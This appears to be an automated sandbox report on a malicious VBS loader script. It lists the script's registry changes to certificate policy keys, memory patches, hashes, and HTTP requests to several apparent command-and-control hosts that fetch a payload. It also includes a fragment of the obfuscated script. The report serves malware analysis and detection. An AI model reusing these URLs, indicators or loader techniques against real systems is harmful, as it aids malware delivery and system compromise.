"UOptbXABFngejdbaQeLpzNGR=Sgn(oKMGDOWZnJqMtLiLkUgyOfTkqwo)'immunopathologist invocations overscribble Rudolphus Quinnesec brachydodromous uncowl hypothesizing prostatocystotomy ardors bedrip microfibril Ishtar wood-embosomed remonetising Machairodontidae swaybacks Weathers Shelden objurgates felonweed encoignure Turanianism zinkified Loredana grun Addis nonappreciatively subadvocate spacewoman somatophyte poco-curante fluoridation Owen debatable zoomimic ate- yardage Diane septilateral Knepper quasi-comprehensive Yunnanese leprosied capnomancy beanstalk spadiard stiffnesses twittery Ramaism geissospermine usurpative updo Efram stolider plasterers pithiest pooching ovenlike uncalmness Emydidae glycolytic oversanguineness wagonwork footsores Halli amadavat unjesting writhled neurorthopteran fine-haired embussing flusters condemning bullism unstain Germinal Kirsti autoepilation condom lautite clams Pomfret Pinochet biogasses DTI killick em- flying intervenue factorial niveous card-counting Sunbury bacteriopson" (Indicator: "twitter") - source
- File/Memory
- relevance
- 7/10
-
Found a reference to a known community page
-
System Security
-
Creates or modifies windows services
- details
- "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies Software Policy Settings
- details
-
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates or modifies windows services
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"wscript.exe" wrote bytes "db0b57a2" to virtual address "0x6E1B1FFC" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "fae67477e1a679772e717977ee29797785e274776da0797726e47477d16d7977003d7777804b777700000000ad379a758b2d9a75b6419a7500000000" to virtual address "0x74AD1000" (part of module "WSHTCPIP.DLL")
"wscript.exe" wrote bytes "e7397577e1a679772e717977ee29797785e274776da07977906478773ad57f7726e47477d16d7977003d7777804b777700000000ad379a758b2d9a75b6419a7500000000" to virtual address "0x75001000" (part of module "WSHIP6.DLL")
"wscript.exe" wrote bytes "c04e777720547877e0657877b53879770000000000d0a27500000000c5eaa2750000000088eaa27500000000e968937582287977ee29797700000000d2699375000000007dbba2750000000009be937500000000ba18a27500000000" to virtual address "0x77981000" (part of module "NSI.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Installs hooks/patches the running process
File Details
MSG_226410.vbs
- Filename
- MSG_226410.vbs
- Size
- 904KiB (925619 bytes)
- Type
- script vbs
- Description
- ASCII text, with very long lines
- Architecture
- WINDOWS
- SHA256
- ed59aa642193cbf79248843836acc502ca8c50a47d6a727946aa99bff33539ba
- MD5
- 5878d0a837ae43feae38524bad4ca555
- SHA1
- a6205723d61d27e0ffc6c580c4c798727363dc2e
- ssdeep
- 12288:8oVbWboFmRPe3c16B+lHTZXjKNN6M5dvMundhjScRMHprp:R1WM66IlHN0N6M5hMo+cRMH/
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 1 process in total.
- wscript.exe "C:\MSG_226410.vbs" (PID: 1612)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
a.8xcornwall.com |
77.104.140.85
TTL: 13422 |
- | Bulgaria |
gdpronline.sk |
37.9.175.9
TTL: 599 |
- | Slovakia (SLOVAK Republic) |
hotdsk.com
OSINT |
173.249.60.219
TTL: 14399 |
Innovadeus Pvt. Ltd. | Germany |
kitaair.com |
46.16.91.179
TTL: 21599 |
- | Italy |
www.kitaair.com |
46.16.91.179
TTL: 21599 |
- | Italy |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
173.249.60.219 |
80
TCP |
wscript.exe PID: 1612 |
Germany |
46.16.91.179 |
80
TCP |
wscript.exe PID: 1612 |
Italy |
46.16.91.179 |
443
TCP |
wscript.exe PID: 1612 |
Italy |
37.9.175.9 |
80
TCP |
wscript.exe PID: 1612 |
Slovakia (SLOVAK Republic) |
77.104.140.85 |
80
TCP |
wscript.exe PID: 1612 |
Bulgaria |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
173.249.60.219:80 (hotdsk.com) | GET | hotdsk.com/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: hotdsk.com More Details |
46.16.91.179:80 (kitaair.com) | GET | kitaair.com/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: kitaair.com More Details |
37.9.175.9:80 (gdpronline.sk) | GET | gdpronline.sk/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: gdpronline.sk More Details |
37.9.175.9:80 (gdpronline.sk) | GET | gdpronline.sk/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: gdpronline.sk More Details |
77.104.140.85:80 (a.8xcornwall.com) | GET | a.8xcornwall.com/12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: a.8xcornwall.com More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 37.9.175.9:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 173.249.60.219:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 46.16.91.179:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 77.104.140.85:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
Extracted Strings
Extracted Files
No significant files were extracted.
Notifications
-
Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-64" are available in the report
- Not all sources for indicator ID "registry-17" are available in the report
- Not all sources for indicator ID "registry-18" are available in the report
- Not all sources for indicator ID "registry-19" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report